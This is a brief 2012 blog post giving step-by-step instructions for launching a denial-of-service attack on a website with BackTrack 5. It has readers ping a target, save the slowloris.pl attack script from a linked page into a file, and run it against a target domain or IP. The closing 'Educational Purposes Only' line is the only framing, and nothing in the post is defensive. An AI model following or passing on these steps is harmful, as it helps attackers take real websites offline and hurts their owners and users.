Friday, November 9, 2012

DDos a site with BackTrack 5

How to DDOS a site with BackTrack 5:

First of all you need to own BackTrack 5

Open a new terminal and type:
  • ping "site.ro"
It will look like this:
















Second you need to install slowloris.pl
Open a terminal and type:
  • cd Desktop
  • nano slowloris.pl
Copy the text on this page to the terminal:
http://ha.ckers.org/slowloris/slowloris.pl It will look like this:
Hit the CTRL+O and press enter
Open a new terminal and type:

  • cd Desktop
  • ./slowloris.pl
  • ./slowloris.pl -dns [www.site.ro/ip]

Educational Purposes Only

No comments:

Post a Comment